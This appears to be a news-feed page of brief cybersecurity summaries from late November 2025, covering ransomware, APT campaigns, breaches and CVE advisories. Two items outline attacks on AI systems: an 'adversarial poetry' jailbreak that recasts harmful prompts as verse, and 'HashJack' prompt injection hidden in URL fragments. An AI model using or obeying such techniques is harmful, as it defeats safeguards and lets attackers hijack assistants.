Cybersecurity training platform TryHackMe issued a public apology on November 28, 2025, after announcing an all-male list of 18 industry helpers for its popular "Advent of Cyber" event. The omission sparked significant backlash from the cybersecurity community regarding the lack of gender diversity and representation. The company acknowledged the mistake was unintentional, stating several female creators had been invited but were unavailable. TryHackMe is now actively working with community members to recruit and onboard women to the panel before the event's launch.

Nov 29, 2025 · 3 min read

Pakistan-linked APT36 Targets Indian Government with New Linux Malware

The Pakistan-based threat group APT36, also known as Transparent Tribe, is conducting an active cyber-espionage campaign against Indian government entities. A CYFIRMA report published on November 29, 2025, details the group's use of a new Python-based malware compiled for Linux systems (ELF format). This development signifies an expansion of APT36's toolkit to target non-Windows environments within sensitive Indian government and strategic sector networks, continuing the group's long-standing focus on intelligence gathering against India.

Nov 29, 2025 · 5 min read

North Korea's Cybercrime is Statecraft, Report Warns

A strategic intelligence report published by CYFIRMA on November 28, 2025, analyzes North Korea's increasing reliance on cybercrime as a core instrument of its statecraft. The report's release is timely, following Russia's 2024 veto that disbanded the UN Panel of Experts responsible for monitoring North Korean sanctions evasion. The analysis details how state-sponsored groups like the Lazarus Group conduct large-scale cyber operations, including cryptocurrency heists and ransomware attacks, to generate revenue that directly funds the nation's weapons programs and sustains the regime.

Nov 29, 2025 · 4 min read

Under Armour Investigates Ransomware Attack, Data Theft Claims

Athletic apparel giant Under Armour is investigating a ransomware attack that has impacted its internal corporate systems. According to a report from November 28, 2025, an unidentified ransomware group has claimed responsibility and alleges it has exfiltrated a large volume of data, including personal records for "millions of individuals." Under Armour has acknowledged the unauthorized access and launched a forensic investigation to determine the scope of the breach and verify the attackers' claims. The incident has caused internal disruptions and poses a significant data privacy risk.

Nov 29, 2025 · 5 min read

DoorDash Discloses Another Breach via Third-Party Vendor

Food delivery service DoorDash disclosed another data breach on November 27, 2025, resulting from a compromise at an unnamed third-party service provider. The incident, reported on November 28, exposed information belonging to both customers and delivery drivers. This breach marks the latest in a series of security incidents for DoorDash involving its supply chain, highlighting persistent vulnerabilities in its network of external vendors and raising concerns about the security of its platform.

Nov 29, 2025 · 5 min read

Oracle Cloud Misconfiguration Exposes Customer Data

Oracle has reported a data breach stemming from misconfigured resources within its own Oracle Cloud Infrastructure (OCI). The incident, first noted on November 13 and analyzed in a report on November 28, 2025, allowed external, unauthorized access to a portion of its cloud environment where customer data was stored. While the full scope and specific customers affected have not been detailed, the breach highlights the significant security challenges of managing large-scale cloud environments, demonstrating that even major cloud providers are susceptible to internal configuration errors.

Nov 29, 2025 · 4 min read

MaaS Provider TAG-150 Distributes Modular Loader and RAT

A Malware-as-a-Service (MaaS) provider, tracked as TAG-150, has been identified operating a campaign active since at least March 2025. According to a threat intelligence report from November 29, 2025, the group is distributing a modular loader that delivers a Remote Access Trojan (RAT). The operation is focused on information theft and leverages user interaction and living-off-the-land techniques to compromise systems. The campaign highlights the ongoing threat from the MaaS ecosystem, which provides cybercriminals with ready-made tools to conduct attacks.

Nov 29, 2025 · 4 min read

French Football Federation Data Breach Exposes Player Info Via Single Compromised Account

The French Football Federation (FFF) announced a significant data breach on November 28, 2025, after an attacker gained access to a centralized administrative software platform using a single compromised user account. The breach exposed the personally identifiable information (PII) of a large number of its 2.3 million members, including names, contact details, and birth dates. The attackers did not exploit a software vulnerability but rather leveraged stolen credentials to gain administrative control. In response, the FFF disabled the account, forced a password reset for all users, and notified both the French data protection authority (CNIL) and the national cybersecurity agency (ANSSI). This incident highlights the critical risk posed by credential compromise and the trend of cyberattacks targeting sports organizations.

Nov 28, 2025 · 6 min read

IT Professional Jailed for 7 Years in Australia for 'Evil Twin' Wi-Fi Attacks on Flights

An Australian IT professional, Michael Clapsis, has been sentenced to seven years and four months in prison for conducting sophisticated 'evil twin' Wi-Fi attacks. Using a Wi-Fi Pineapple device, he created rogue Wi-Fi hotspots at airports and on flights to trick travelers into entering their credentials into a phishing portal. Clapsis then used this access to infiltrate the online accounts of multiple women, stealing thousands of private images and videos. The Australian Federal Police (AFP) investigation began after airline staff reported a suspicious network. Clapsis also attempted to obstruct the investigation by deleting evidence and abusing his IT privileges at work to spy on meetings between his employer and the AFP.

Nov 28, 2025 · 5 min read

Massive Scan of Public GitLab Repositories Uncovers Over 17,000 Live Secrets

A security engineer, Luke Marshall, conducted a large-scale scan of all 5.6 million public repositories on GitLab Cloud, uncovering 17,430 verified, live secrets. The exposed credentials include thousands of API keys and access tokens for over 2,800 unique domains, with Google Cloud Platform (GCP) keys being the most common. The scan, performed using the open-source tool TruffleHog, highlights the pervasive issue of developers hardcoding secrets in public code. Alarmingly, 406 valid GitLab access tokens were found within GitLab's own repositories. The research also uncovered 'zombie secrets' that have remained valid for over a decade, posing a long-term risk. Marshall's responsible disclosure efforts led to multiple bug bounty payouts.

Nov 28, 2025 · 6 min read

Legacy Python Scripts Create Dormant Supply Chain Risk via Abandoned Domain

Security researchers at ReversingLabs have identified a long-dormant supply chain vulnerability within the Python ecosystem affecting packages that use the legacy 'zc.buildout' tool. Outdated bootstrap scripts (`bootstrap.py`) found in several PyPI packages contain hardcoded references to an abandoned domain, `python-distribute.org`. This domain, once used for a fork of the Setuptools project, is now for sale. An attacker could purchase the domain, host malicious code, and automatically compromise any developer or build system that runs one of these legacy scripts. This creates a direct vector for malware injection, exposing an unknown number of projects to a decade-old risk.

Nov 28, 2025 · 6 min read

'Adversarial Poetry' Emerges as Universal Jailbreak for Major LLMs

A new research paper has unveiled a simple yet powerful technique, dubbed 'adversarial poetry,' that can consistently bypass the safety guardrails of major Large Language Models (LLMs). By reformulating harmful prompts into verse, researchers were able to achieve jailbreak success rates up to 18 times higher than with plain text. The technique proved effective as a 'universal single-turn jailbreak' across 25 different AI models, including both proprietary and open-source ones. It successfully generated content related to dangerous topics like CBRN threats and cyber-offenses, revealing a fundamental weakness in current AI alignment strategies that appear overly sensitive to a prompt's style rather than its semantic content.

Nov 28, 2025 · 6 min read

Bloody Wolf APT Shifts Tactics, Using Legitimate RATs to Target Central Asian Governments

The cyber-espionage group 'Bloody Wolf' has expanded its campaign, now targeting government entities in Kyrgyzstan and Uzbekistan. According to research from Group-IB, the APT group has evolved its tactics, moving away from custom malware to a more streamlined, Java-based delivery method. The new attack chain tricks victims into installing the legitimate NetSupport Manager remote administration tool (RAT). By using a widely recognized commercial tool, Bloody Wolf aims to evade detection by blending its malicious activities with normal administrative network traffic, sustaining its long-term espionage and data exfiltration goals.

Nov 28, 2025 · 6 min read

CISA Adds Actively Exploited OpenPLC XSS Flaw to KEV Catalog After Hacktivist Attacks

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a cross-site scripting (XSS) vulnerability in OpenPLC ScadaBR, CVE-2021-26829, to its Known Exploited Vulnerabilities (KEV) catalog. The action, taken on November 28, 2025, follows confirmed reports of active exploitation by the pro-Russian hacktivist group TwoNet. The group was observed using the flaw to deface the HMI of an industrial control system honeypot. The medium-severity vulnerability allows an attacker with access to the system to inject malicious scripts. Federal agencies are now required to patch the flaw by December 19, 2025, to protect against this confirmed threat to ICS/OT environments.

Nov 28, 2025 · 7 min read

Tomiris APT Refines Toolkit, Using Discord and Telegram for C2 in Diplomatic Attacks

The cyber-espionage group 'Tomiris' has upgraded its tactical arsenal in a new wave of attacks targeting diplomatic and government organizations in Russia and Commonwealth of Independent States (CIS) countries. According to a new report from Kaspersky, the APT group is now using public services like Discord and Telegram for command-and-control (C2) communications to better evade detection. The group uses tailored spear-phishing emails to deliver a variety of payloads, including reverse shells and custom backdoors, and deploys specialized 'FileGrabber' malware to steal documents, demonstrating a focus on long-term intelligence gathering.

Nov 28, 2025 · 6 min read

Major Cyberattack Hits Three London Councils, Crippling Public Services

A major cyber incident was declared on November 26, 2025, after a coordinated attack struck the shared IT infrastructure of three London councils: the Royal Borough of Kensington and Chelsea (RBKC), Westminster City Council (WCC), and the London Borough of Hammersmith and Fulham (LBHF). The attack disrupted essential services, including phone lines, for over half a million residents. The councils, which operate under a joint IT arrangement, were forced to activate emergency protocols to maintain critical functions. The UK's National Cyber Security Centre (NCSC) is assisting with the investigation. While the nature of the attack is unconfirmed, experts suspect it is a ransomware incident, potentially targeting a shared managed service provider (MSP), raising fears of a significant data breach involving sensitive citizen information.

Nov 27, 2025 · 6 min read

New 'HashJack' Attack Injects Malicious Prompts into AI Browsers

On November 26, 2025, researchers disclosed a novel indirect prompt injection attack called 'HashJack' that targets AI-enabled web browsers. The technique works by embedding malicious instructions in the fragment portion of a URL (the text following a '#' symbol). Because URL fragments are processed client-side and are not sent to the server, they are invisible to most network security tools like firewalls and web gateways. However, AI assistants integrated into browsers often parse the full URL, including the fragment, to gain context. This allows an attacker to craft a seemingly benign link that, when visited, secretly instructs the user's AI assistant to perform malicious actions, creating a significant new attack surface.

Nov 27, 2025 · 6 min read

Mitsubishi ICS Software Flaw Exposes Credentials in Plaintext

On November 27, 2025, Mitsubishi Electric issued a security advisory for CVE-2025-3784, an information disclosure vulnerability in its GX Works2 industrial control system (ICS) software. The flaw, which affects all versions of the software, involves the storage of credential information in plaintext within project files. An attacker with local access to a computer running the software could extract these credentials and use them to bypass authentication on project files, allowing them to view or modify critical industrial process information. The vulnerability has a CVSS score of 5.5. Mitsubishi is developing a patch and has provided interim mitigation guidance.

Nov 27, 2025 · 6 min read

Critical 10.0 CVSS Flaw in Azure Bastion Allows Full Cloud Takeover

Microsoft has patched a critical authentication bypass vulnerability, CVE-2025-49752, in its Azure Bastion service. The flaw, which scores a perfect 10.0 on the CVSS scale, could allow a remote, unauthenticated attacker to gain administrative control over all virtual machines connected via a vulnerable Bastion host. The vulnerability is a capture-replay flaw, where an attacker can intercept and reuse authentication tokens. All Azure Bastion deployments created before the patch on November 20, 2025, are considered vulnerable, and customers are urged to ensure their instances are updated.

Nov 27, 2025 · 5 min read

Asahi Breweries Crippled by Ransomware Attack, Shipments Plummet to 10% Ahead of Peak Holiday Season

Japan's largest brewer, Asahi Group Holdings Ltd., is facing severe operational paralysis more than a month after a devastating ransomware attack. The attack disabled the company's core order and shipment management system, forcing a reversion to manual processes such as phone calls and faxes. As a result, shipments are at only 10% of normal levels, a critical blow as the company enters its busiest sales month. The incident, which has also forced Asahi to postpone its Q3 earnings report, highlights the extreme vulnerability of complex supply chains and legacy IT systems to modern cyber threats.

Nov 26, 2025 · 5 min read

CodeRED Emergency Alert System Crippled by 'Inc Ransom' Attack, Disrupting US Public Safety

The OnSolve CodeRED emergency alert system, a critical communication tool for hundreds of U.S. municipalities, has been taken offline following a ransomware attack claimed by the 'Inc Ransom' group. The attack, which began on November 1, 2025, resulted in the encryption of systems and the exfiltration of user data, including names, addresses, and contact information. After failed ransom negotiations, the vendor was forced to decommission the legacy platform, causing significant service disruptions for local governments in numerous states and leaving them unable to issue vital public safety notifications.

Nov 26, 2025 · 6 min read

Geopolitical Shift: Russian and North Korean State Hackers Found Sharing Attack Infrastructure

In a rare and alarming discovery, security researchers have found evidence of operational collaboration between two of the world's most prolific state-sponsored hacking groups: Russia's Gamaredon (Pitty Tiger) and North Korea's Lazarus. The evidence centers on a shared command-and-control (C2) server IP address that was used by both groups within days of each other to deliver their respective malware payloads. This convergence of TTPs and infrastructure signals a potential new phase of cyber operations where geopolitical alliances between Moscow and Pyongyang are extending into direct, cooperative attacks, potentially amplifying the threat level for defenders globally.

Nov 26, 2025 · 6 min read

Water Gamayun APT Exploits Novel 'MSC EvilTwin' Windows Flaw in Stealthy Attacks

The Russia-aligned APT group Water Gamayun is actively exploiting a novel vulnerability in the Windows Microsoft Management Console (MMC), tracked as CVE-2025-26633. The attack, analyzed by Zscaler and dubbed 'MSC EvilTwin,' uses a malicious .msc file to proxy code execution through the trusted mmc.exe binary, making it difficult to detect. The multi-stage campaign begins with a malicious download and uses embedded commands to execute hidden PowerShell payloads. This technique allows the attackers to install backdoors and information stealers while evading traditional security measures, showcasing the group's continued sophistication in developing stealthy intrusion methods.

Nov 26, 2025 · 6 min read

CISA Warns of Critical Flaws in Industrial Control Systems, Including CVSS 10.0 Bug

On November 25, 2025, CISA issued seven new advisories for vulnerabilities in Industrial Control Systems (ICS) from multiple vendors, including Rockwell Automation, Opto 22, and Zenitel. The flaws affect equipment used globally in critical manufacturing and communications sectors. The most severe vulnerability, CVE-2025-64130, is a critical OS command injection flaw in Zenitel communications equipment with a CVSS score of 10.0, which could allow for remote code execution. Other advisories cover flaws leading to denial-of-service and information exposure, prompting CISA to urge immediate review and mitigation by asset owners.

Nov 26, 2025 · 6 min read

NVIDIA AI Toolkit and WordPress Plugins Hit with High-Severity Flaws

On November 25, 2025, several new software vulnerabilities were disclosed, including a high-severity Server-Side Request Forgery (SSRF) flaw in NVIDIA's NeMo Agent Toolkit (CVE-2025-33203) used for AI development. This flaw could lead to information disclosure and denial of service. Concurrently, vulnerabilities were found in popular WordPress plugins. The 'Just Highlight' plugin is affected by a stored Cross-Site Scripting (XSS) bug (CVE-2025-13311), while the 'Locker Content' plugin has a sensitive information exposure flaw (CVE-2025-12525) that could allow unauthenticated attackers to bypass content restrictions.

Nov 26, 2025 · 6 min read

Homeland Security Warns Gov't Shutdown and Lapsed Law Cripple U.S. Cyber Defenses

The U.S. House Committee on Homeland Security has issued a stark warning in its latest 'Cyber Threat Snapshot,' stating that the nation's ability to defend against cyber threats is being severely hampered. The report cites a dual crisis: a federal government shutdown that furloughs key cybersecurity personnel, and the lapse of the Cybersecurity Information Sharing Act of 2015. This creates 'dangerous blind spots' at a time of heightened threat activity from nation-state actors like China and Iran, and a surge in attacks against U.S. critical infrastructure.

Nov 25, 2025 · 4 min read

Akira Ransomware Targets M&A Blind Spots, Breaching Firms via Inherited SonicWall Devices

The Akira ransomware group is exploiting security blind spots created during corporate mergers and acquisitions (M&A). According to research by ReliaQuest, Akira affiliates are gaining initial access to acquiring companies by compromising vulnerable SonicWall SSL VPN appliances inherited from smaller, acquired firms. Attackers leverage the fact that the acquiring organizations are often unaware of these unpatched, legacy devices on their new network. Once inside, they use zombie credentials and move laterally, with the time from lateral movement to ransomware deployment averaging less than one hour, highlighting a rapid and effective attack chain.

Nov 25, 2025 · 5 min read

URGENT: CISA Orders 7-Day Patch for Actively Exploited FortiWeb Zero-Day

Fortinet has disclosed a critical OS command injection zero-day vulnerability, CVE-2025-58034, in its FortiWeb Web Application Firewall (WAF) that is being actively exploited in the wild. The flaw allows an authenticated attacker to execute arbitrary commands on the underlying system. In response to observed attacks, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog and issued an emergency directive mandating federal agencies apply patches within an accelerated seven-day window, by November 25, 2025. Researchers have detected approximately 2,000 attacks leveraging the flaw and warn it could potentially be chained with a recently disclosed authentication bypass vulnerability (CVE-2025-64446) to achieve unauthenticated remote code execution.

Nov 24, 2025 · 5 min read

Massive NPM Supply Chain Attack Spreads Self-Replicating "Shai-Hulud" Worm

A significant, ongoing supply chain attack is targeting the NPM JavaScript ecosystem, where a self-replicating worm dubbed "Shai-Hulud" has infected over 400 software packages. The attack has a substantial impact on the cryptocurrency sector, compromising at least 10 widely used libraries crucial for the Ethereum Name Service (ENS), including 'content-hash' and 'address-encoder'. The malware functions as a general-purpose credential stealer, exfiltrating secrets like wallet keys from infected developer environments. The scale is vast, with researchers at Wiz observing over 25,000 affected repositories, highlighting a critical threat to developer infrastructure worldwide.

Nov 24, 2025 · 5 min read

FCC Rolls Back ISP Cybersecurity Rules Despite China-Linked Hacking Threats

In a controversial decision, the U.S. Federal Communications Commission (FCC) has rescinded cybersecurity regulations for internet service providers (ISPs). These rules were implemented by the Biden Administration following the discovery that the Chinese state-sponsored hacking group Salt Typhoon had breached major U.S. carriers. The revoked rules mandated minimum security standards and compliance certifications. The FCC claimed the original ruling was based on a "flawed legal analysis," but the move has drawn sharp criticism, with Commissioner Anna M. Gomez stating it leaves the country "less secure" against increasing nation-state threats.

Nov 24, 2025 · 4 min read

Akira Ransomware Gang Hits LG Energy Solution, Claims 1.7TB Data Theft

South Korean battery manufacturing giant LG Energy Solution has confirmed it was the victim of a ransomware attack at one of its overseas facilities. The notorious Akira ransomware gang has claimed responsibility for the breach, alleging on its dark web leak site that it stole 1.7 terabytes of data from the company's network. While LG Energy Solution reports that the affected systems have been restored and its headquarters was not impacted, the incident highlights the continued threat of double-extortion ransomware attacks against the manufacturing sector. The Akira gang has been highly active, often gaining initial access via compromised VPN credentials.

Nov 24, 2025 · 5 min read

New "Autumn Dragon" Espionage Campaign Targets Southeast Asia

A newly identified cyber-espionage campaign named "Autumn Dragon" has been targeting government and media organizations across Southeast Asia since early 2025. The operation, attributed with medium confidence to a China-nexus Advanced Persistent Threat (APT) group, aims to gather intelligence related to the South China Sea. The attackers use spearphishing emails with malicious WinRAR archives that exploit the vulnerability CVE-2025-8088. Upon execution, a dropper script masquerading as a Windows Defender update retrieves and runs additional payloads to establish a foothold for intelligence gathering.

Nov 24, 2025 · 5 min read

ShadowPad Backdoor Deployed via Critical WSUS Server Vulnerability

An active intrusion campaign is exploiting a critical remote code execution (RCE) vulnerability, CVE-2025-59287, in Microsoft's Windows Server Update Services (WSUS). Attackers, believed to be Chinese state-sponsored APTs, are leveraging the flaw to gain system-level access and deploy the sophisticated ShadowPad backdoor. The attack chain involves using PowerShell and legitimate system utilities like 'certutil' and 'curl' to download the malware, which is then executed using a DLL sideloading technique for stealth and persistence. The campaign highlights the rapid weaponization of newly disclosed vulnerabilities for espionage purposes.

Nov 24, 2025 · 5 min read

Supply Chain Breaches Escalate Despite Maturing Defenses, Report Finds

A new 2025 report from cybersecurity firm BlueVoyant reveals a troubling trend: despite most organizations maturing their third-party risk management (TPRM) programs, the number of supply chain breaches is escalating. The study found that 97% of surveyed organizations experienced a supplier-related security incident in the past year, a significant jump from 81% in 2024. The report identifies ineffective tool integration and internal organizational silos as key barriers, with the manufacturing sector being particularly hard-hit, averaging 3.8 breaches per organization.

Nov 24, 2025 · 4 min read

Ransomware Attacks Peak on Holidays and Weekends, Exploiting Low Staffing

A new global study by Semperis, the "2025 Holiday Ransomware Risk Report," confirms that threat actors strategically launch attacks during holidays and weekends to exploit reduced security staffing. The report found that 52% of organizations were targeted during these off-hour periods. Alarmingly, 78% of companies cut their Security Operation Center (SOC) staffing by 50% or more during these times. The study also revealed that 60% of attacks follow major corporate events like mergers or layoffs, when organizations are most distracted.

Nov 24, 2025 · 3 min read

Italian IT Firm Almaviva Hit by Cyberattack, 2.3TB of Data Leaked

The prominent Italian IT services provider Almaviva has confirmed it was hit by a major cyberattack, resulting in the theft and leaking of nearly 2.3 terabytes of sensitive data. The breach has exposed information from several of Almaviva's clients, most notably Italy's national railway operator, Ferrovie dello Stato Italiane. The leaked files reportedly include highly sensitive data such as passenger passport details, employee records, financial documents, and defense-related contracts. The identity of the attackers has not yet been disclosed.

Nov 24, 2025 · 5 min read

Harvard University Data Breach Exposes Donor Information After Phone Phishing Attack

Harvard University has disclosed a data breach affecting its Alumni Affairs and Development Office, discovered on November 18, 2025. The incident originated from a phone-based phishing (vishing) attack that gave an unauthorized party access to systems containing personal information and donation records of university affiliates and donors. While highly sensitive data like Social Security numbers were reportedly not compromised, the breach exposed names, contact details, and donation histories. This attack follows a similar pattern seen in recent incidents at Princeton University and the University of Pennsylvania, indicating a targeted campaign against the development departments of major educational institutions.

Nov 23, 2025 · 5 min read

Logitech Confirms Breach: Clop Ransomware Exploits Oracle Zero-Day

Logitech has confirmed it suffered a data breach after the Clop ransomware gang exploited a zero-day vulnerability in Oracle's E-Business Suite (CVE-2025-61882). The consumer electronics giant stated that an unauthorized third party accessed and copied data related to employees, consumers, and suppliers. The incident is part of a wider campaign by Clop that has impacted numerous major organizations. Logitech asserts that sensitive personal data like credit card numbers was not exposed and business operations remain unaffected.

Nov 23, 2025 · 5 min read

CISA KEV Alert: Actively Exploited Oracle RCE Flaw Allows Full System Takeover

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical remote code execution (RCE) vulnerability in Oracle Identity Manager, CVE-2025-61757, to its Known Exploited Vulnerabilities (KEV) catalog. The flaw, with a CVSS score of 9.8, allows an unauthenticated attacker to achieve RCE by chaining an authentication bypass with a code injection flaw in a Groovy script endpoint. Evidence of in-the-wild exploitation, including scans detected weeks before a patch was available, has prompted CISA to issue a patching deadline of December 12, 2025, for federal agencies.

Nov 22, 2025 · 5 min read

Chinese APT24 Group Uses 'BadAudio' Malware in Years-Long Espionage Campaign Targeting Taiwan

The Chinese-nexus threat group APT24, also known as Pitty Tiger, is behind a nearly three-year cyberespionage campaign utilizing a new custom malware called 'BadAudio'. According to Google's Threat Intelligence Group, the campaign, active since November 2022, has targeted organizations primarily in Taiwan. The group has evolved its tactics from broad web compromises to sophisticated supply chain attacks and spear-phishing. BadAudio is a C++ downloader that uses DLL search-order hijacking and control flow flattening to evade detection before deploying second-stage payloads like Cobalt Strike.

Nov 22, 2025 · 6 min read

Major Wall Street Banks Exposed After Breach at Mortgage Vendor SitusAMC

SitusAMC, a critical technology and services provider for the real estate finance industry, has disclosed a significant data breach discovered on November 12, 2025. The cyberattack compromised corporate information and, more critically, data belonging to its clients' customers, which could include sensitive personal information from mortgage applications. Major financial institutions, including JPMorgan Chase, Citigroup, and Morgan Stanley, have reportedly been notified of their potential exposure. The FBI is investigating the incident, which highlights the systemic risk posed by third-party vendors in the financial sector.

Nov 22, 2025 · 5 min read

Grafana Enterprise Hit by Critical 10.0 CVSS Flaw Allowing Admin Impersonation

Grafana Labs has patched a critical vulnerability, CVE-2025-41115, in Grafana Enterprise that carries the maximum CVSS score of 10.0. The flaw resides in the SCIM provisioning feature and allows a malicious SCIM client to escalate privileges and impersonate any user, including the default administrator, by manipulating the 'externalId' attribute. The vulnerability affects Grafana Enterprise versions 12.0.0 through 12.2.1 and requires specific feature flags to be enabled. Grafana has released patches and confirmed its own cloud instances were not exploited.

Nov 22, 2025 · 5 min read

CrowdStrike Fires Insider for Leaking Screenshots to 'Scattered Lapsus$ Hunters' Hacking Group

Cybersecurity giant CrowdStrike has confirmed it fired an employee last month for acting as a malicious insider. The employee leaked screenshots of internal systems, including an Okta dashboard, to the 'Scattered Lapsus$ Hunters' hacking group, who then posted them on Telegram. CrowdStrike stated that it detected and terminated the insider, that its corporate systems were not breached, and that no customer data was compromised. The hackers claimed to have offered the employee $25,000 for access, highlighting the persistent threat of malicious insiders even at top security firms.

Nov 22, 2025 · 5 min read

ShinyHunters Hits Salesforce Again, Breaching Customers via Gainsight App

Salesforce has disclosed a significant data breach affecting its customers, stemming from a compromised connection with the Gainsight customer success application. The notorious cybercrime group ShinyHunters, also tracked as UNC6240, has claimed responsibility for the attack, stating they exploited OAuth tokens to gain unauthorized access to approximately 285 additional Salesforce instances. In response, Salesforce has revoked credentials and removed the Gainsight apps from its AppExchange. The incident highlights the growing risk of supply chain attacks targeting trusted third-party SaaS integrations to pivot into major enterprise environments.

Nov 21, 2025 · 6 min read

SEC Abandons Landmark Lawsuit Against SolarWinds and its CISO

In a surprising move, the U.S. Securities and Exchange Commission (SEC) has voluntarily dismissed its civil enforcement action against SolarWinds and its CISO, Timothy G. Brown. The lawsuit, filed in October 2023, had accused the company and Brown of misleading investors about their cybersecurity posture before the 2020 SUNBURST supply chain attack. The dismissal is seen as a major victory for the cybersecurity community, which had feared the case would set a dangerous precedent for holding security executives personally liable for breaches and create a chilling effect on transparency.

Nov 21, 2025 · 5 min read

SANS Report: OT/ICS Cyber Incidents Rising, 40% Cause Downtime

A new report from the SANS Institute highlights a dangerous trend in the security of Operational Technology (OT) and Industrial Control Systems (ICS). The '2025 State of ICS/OT Security Report' found that over 21% of organizations experienced a cyber incident in their OT environment in the past year. Of those, 40.3% suffered operational downtime. Ransomware was a primary cause, responsible for 37.9% of incidents, with unauthorized external connections being the top initial access vector. The report also points to a significant 'resilience gap,' with recovery times often exceeding one month.

Nov 21, 2025 · 5 min read

WEL Companies Investigated for Data Breach Affecting 122,960 People

The law firm Schubert Jonckheer & Kolbe LLP is investigating transportation and logistics firm WEL Companies, Inc., following a data breach that compromised the sensitive personal information of 122,960 people. The breach, which exposed names, Social Security numbers, and driver's license numbers, was first detected in January 2025. However, the company only began notifying victims in November 2025, a delay of nearly ten months that could lead to legal action for violating data breach notification laws.

Nov 21, 2025 · 4 min read

Patch Now: Microsoft Fixes Actively Exploited Windows Kernel Zero-Day

As part of its November 2025 Patch Tuesday release, Microsoft has addressed 63 security vulnerabilities, including a high-severity zero-day flaw in the Windows Kernel (CVE-2025-62215) that is confirmed to be under active exploitation. The vulnerability is a local privilege escalation (LPE) bug with a CVSS score of 7.0, allowing an attacker who has already gained initial access to a system to elevate their privileges to SYSTEM level. Such flaws are critical components in post-exploitation attack chains, enabling threat actors to take full control of a compromised machine. The update also fixes 16 remote code execution (RCE) vulnerabilities and numerous other flaws across the Microsoft product suite. Immediate patching is strongly recommended for all Windows users.

Nov 21, 2025 · 5 min read

Sinobi Ransomware Strikes US Manufacturer and Indian Tech Firm

The 'sinobi' ransomware group has claimed responsibility for two recent cyberattacks targeting organizations in the United States and India. The victims are Croft, a U.S.-based window and door manufacturer, and CHANGEPOND, an enterprise software company headquartered in Chennai, India. Both breaches were discovered on November 19, 2025, occurring within minutes of each other. These incidents underscore the global reach and indiscriminate targeting of ransomware operators, affecting diverse sectors including manufacturing and technology. The attacks highlight the persistent threat posed by ransomware and the importance of robust cybersecurity defenses.

Nov 20, 2025 · 4 min read

CISA and Partners Release Guide to Combat Bulletproof Hosting

The U.S. Cybersecurity and Infrastructure Security Agency (CISA), along with the FBI, NSA, and international partners, has published a comprehensive guide to help network defenders and Internet Service Providers (ISPs) combat the threat of bulletproof hosting (BPH) providers. These services knowingly lease infrastructure to cybercriminals for a wide range of malicious activities, including ransomware, phishing, and malware distribution. The guide, 'Bulletproof Defense,' provides actionable recommendations for filtering malicious traffic, enhancing network monitoring, and improving intelligence sharing to disrupt the criminal ecosystem that relies on BPH for anonymity and resilience.

Nov 20, 2025 · 4 min read

CISA Issues 6 New ICS Advisories for Schneider Electric, Shelly, METZ CONNECT

On November 19, 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released six new Industrial Control Systems (ICS) advisories, highlighting multiple vulnerabilities in products from Schneider Electric, Shelly, and METZ CONNECT. The alerts affect a range of operational technology (OT) products, including SCADA systems and power monitoring devices. Four of the advisories are for Schneider Electric products like EcoStruxure and PowerChute. CISA urges administrators in critical infrastructure and manufacturing sectors to review the advisories and apply the recommended mitigations to prevent potential exploitation.

Nov 20, 2025 · 4 min read

CISA Releases "Be Air Aware" Guides to Combat Drone Threats

As part of Critical Infrastructure Security and Resilience Month, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released three new guides under its "Be Air Aware™" campaign. These resources are designed to help critical infrastructure owners and operators understand, assess, and mitigate the growing security risks posed by Unmanned Aircraft Systems (UAS), or drones. The guides provide actionable information on detecting suspicious drone activity, implementing detection technologies, and safely handling downed aircraft, aiming to integrate aerial threat considerations into existing security plans.

Nov 20, 2025 · 4 min read

New 'Nova Stealer' Malware Targets macOS Crypto Wallets

A new information-stealing malware, dubbed 'Nova Stealer,' has been discovered actively targeting Apple macOS users. The malware's primary goal is the exfiltration of sensitive data, with a specific focus on cryptocurrency wallets. Nova Stealer operates as a trojan, infecting systems by replacing legitimate, installed applications with malicious versions. When a user launches the compromised application, the malware activates in the background to search for and steal wallet files and other valuable information. This discovery underscores the increasing trend of threat actors developing malware for the macOS platform, challenging the perception of it being inherently more secure than Windows.

Nov 20, 2025 · 4 min read

Inc Ransom Cripples PA Attorney General's Office, Exfiltrates 5.7 TB of Data

The Pennsylvania Office of the Attorney General (OAG) has confirmed it suffered a severe data breach orchestrated by the Inc Ransom ransomware group. The attackers exploited the 'CitrixBleed2' vulnerability (CVE-2025-5777) to gain initial access and subsequently exfiltrated 5.7 terabytes of highly sensitive data. The stolen information includes Social Security numbers, medical details, and confidential investigative files. The attack, which occurred in August 2025, caused a three-week operational disruption for the agency's 1,200 staff members. The OAG has refused to pay the ransom and is working with the FBI on the investigation.

Nov 19, 2025 · 7 min read

US, UK, and Australia Sanction Russian Bulletproof Hosting Network Aiding Ransomware

In a coordinated action, the United States, United Kingdom, and Australia have sanctioned Media Land, LLC, a Russian bulletproof hosting provider, along with its network of related entities and key individuals. This infrastructure is accused of providing essential services to a wide range of global cybercriminals, including malware distributors, phishing operators, and ransomware groups like the notorious LockBit gang. The sanctions aim to disrupt the foundational services that enable cybercrime by targeting the providers who knowingly support malicious operations. The action highlights a strategic international effort to dismantle the cybercrime economy.

Nov 19, 2025 · 6 min read

CISA Adds Actively Exploited Fortinet FortiWeb Flaw to KEV Catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical OS command injection vulnerability in Fortinet's FortiWeb products, CVE-2025-58034, to its Known Exploited Vulnerabilities (KEV) catalog. Citing evidence of active exploitation, CISA has mandated a one-week remediation deadline for Federal Civilian Executive Branch (FCEB) agencies under Binding Operational Directive (BOD) 22-01. The vulnerability allows attackers to execute arbitrary commands on affected devices. CISA strongly urges all organizations using FortiWeb to prioritize patching this flaw to mitigate the threat.

Nov 19, 2025 · 6 min read

Chicago's St. Anthony Hospital Discloses Data Breach Affecting Over 6,600

St. Anthony Hospital in Chicago has reported a data breach that may have exposed the personal and medical information of more than 6,600 patients and staff members. The incident, which was discovered in February 2025, occurred when an unauthorized party gained access to several employee email accounts. An investigation revealed that the compromised accounts contained sensitive data, including names, Social Security numbers, medical record numbers, and medical histories. The hospital states there is no evidence the data has been misused but is in the process of notifying all affected individuals.

Nov 19, 2025 · 6 min read

Supply Chain Attacks & AI-Powered Phishing Surge Across Asia-Pacific, Darktrace Warns

